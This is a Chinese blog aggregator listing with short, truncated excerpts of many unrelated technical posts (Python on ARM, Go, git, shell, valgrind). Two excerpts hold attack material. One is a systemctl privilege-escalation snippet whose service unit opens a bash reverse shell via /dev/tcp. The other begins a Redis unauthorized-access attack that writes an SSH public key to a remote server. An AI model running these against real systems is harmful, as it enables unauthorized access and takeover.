linux 安装 Python 请参考 我的博客; 按照教程安装完毕后,没问题,但在使用 第三方包时,出现 Illegal instruction,并直接退出 Python; 解决方法: 在环境变量里加入 export OPENBLAS_CORETYPE=ARMV8 ...
                            
                            
                                分类:
编程语言   时间:
2021-05-24 16:02:37   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                https://mp.weixin.qq.com/s/HGfRRO1Acz-sVe_vLau2FA 初学Go语言时常见的小坑:goroutine、panic和recover 原创 博文视点 博文视点Broadview 2020-07-23 ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 15:49:09   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    官方二进制包方式: # 下载 starport 二进制到 /usr/local/bin $ curl https://get.starport.network/starport! | bash # 如果没有权限,分两步: $ curl https://get.starport.network/sta ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 15:42:42   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 14:55:34   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                1. 登录 kubectl get pods kubectl exec -it onedata-oracle-795d6c558b-b2cqj /bin/bash sqlplus /nolug connect / as sysdba 2. 用户账号 创建: create user onedata i ...
                            
                            
                                分类:
数据库   时间:
2021-05-24 14:53:10   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                1.git下载与安装 https://gitforwindows.org/ 一般一直下一步即可 任务栏 打开Git Bash,输入: # 配置用户名 git config --global user.name "username" //( "username"是自己的账户名,) # 配置邮箱 git ...
                            
                            
                                分类:
Web程序   时间:
2021-05-24 13:46:15   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    安装 javaee jdk mysql apache ideaIU shell编程 x.sh脚本 格式要求: 1.脚本以#!/bin/bash开头 2.脚本要有可执行权限 vim hello.sh 写上: #!/bin/bash echo "hello,world" 保存退出 sh hello.sh ...
                            
                            
                                分类:
系统相关   时间:
2021-05-24 13:41:21   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    写公钥 ssh-keygen -t rsa # 生成key (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /tmp/key.txt # 前后加换行 cat /tmp/key.txt | redis-cli -h 59.xx.xx.157 -x  ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 13:41:02   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    valgrind使用 valgrind --tool=memcheck --leak-check=full --log-file=valgrind-log.txt ./build/executable --args gdb使用带参数 gdb --args ./build/executable --a ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 12:21:49   
                                阅读次数:
0
                             
                         
                    
                        
                            
                            
                                
                    第一步获取待下载文件列表. 解压缩到到执行目录下面 我这边使用Windows10 里面的 WSL的方式直接进行相关工作 ls *.zip > list.url 将需要下载的zip包变成列表文件. 第二步 使用shell脚本进行判断文件是否存在 #!/bin/bash echo " "> /deplo ...
                            
                            
                                分类:
其他好文   时间:
2021-05-24 12:11:03   
                                阅读次数:
0